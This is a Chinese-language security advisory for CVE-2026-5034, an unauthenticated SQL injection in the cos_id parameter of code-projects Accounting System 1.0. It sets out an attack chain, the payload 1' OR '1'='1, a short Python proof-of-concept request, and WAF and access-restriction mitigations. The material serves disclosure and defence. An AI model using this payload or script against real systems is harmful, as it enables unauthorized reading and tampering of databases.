CVE-2026-5034 CVSS 7.3 高危

CVE-2026-5034: code-projects会计系统SQL注入漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5034

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Accounting System

漏洞概述

code-projects Accounting System 1.0版本中存在安全漏洞。受影响的是/edit_costumer.php文件的参数处理组件。攻击者可以通过操纵参数cos_id来触发SQL注入漏洞。该漏洞无需认证且无需用户交互即可通过网络远程发起攻击，可能导致数据库信息泄露、数据篡改或服务受限，对系统的机密性、完整性和可用性造成影响。

技术细节

该漏洞根源在于code-projects Accounting System 1.0版本的/edit_costumer.php文件中存在不安全的数据库查询实现。系统在接收用户输入的参数cos_id时，未实施有效的安全过滤机制，直接将其拼接到SQL语句中执行。由于CVSS向量显示PR:N（无需权限）和UI:N（无需交互），攻击者无需登录账户或诱导用户操作，仅需向服务器端发送精心构造的HTTP GET或POST请求即可触发漏洞。攻击者可以利用经典的SQL注入技术，如单引号闭合、联合查询（UNION SELECT）或布尔盲注，从而绕过应用程序的逻辑检查。成功的攻击可能导致后台数据库中的敏感信息（如用户凭证、财务记录）被非法读取、修改或删除，严重威胁系统的数据安全。目前已有公开的PoC代码验证了该利用路径。

攻击链分析

STEP 1

侦察

攻击者识别出目标网络中运行code-projects Accounting System 1.0版本的服务器。

STEP 2

漏洞利用

攻击者向/edit_costumer.php发送特制的HTTP请求，在cos_id参数中注入恶意SQL代码（如1' OR '1'='1）。

STEP 3

命令执行

后端数据库接收并执行了包含恶意负载的SQL查询语句，导致数据库逻辑被改变。

STEP 4

数据窃取/破坏

攻击者通过返回的结果获取敏感数据，或者利用注入语句修改、删除数据库中的内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(target_url):
    """Function to test SQL injection vulnerability"""
    endpoint = target_url + "/edit_costumer.php"
    # Payload to trigger SQL syntax error or bypass logic
    payload = "1' OR '1'='1"
    params = {
        "cos_id": payload
    }
    try:
        response = requests.get(endpoint, params=params, timeout=5)
        if response.status_code == 200:
            print("[+] Potential SQL Injection detected.")
            print(f"Response: {response.text[:100]}")
        else:
            print("[-] No obvious vulnerability detected.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1" # Replace with actual target
    check_sqli(target)

影响范围

code-projects Accounting System 1.0

防御指南

临时缓解措施

建议立即在Web应用防火墙（WAF）中添加针对SQL注入的防护规则，拦截对cos_id参数的恶意输入。如无法立即升级，请临时限制对/edit_costumer.php页面的外部网络访问，仅允许受信任的IP地址连接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5034
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5034
3 Details https://www.cvedetails.com/cve/CVE-2026-5034/
4 VulDB https://vuldb.com/cve/CVE-2026-5034
5 Link https://code-projects.org/
6 Link https://github.com/Xu-Zhihan/CVE/issues/7
7 Link https://vuldb.com/submit/778594
8 Link https://vuldb.com/vuln/353960
9 Link https://vuldb.com/vuln/353960/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表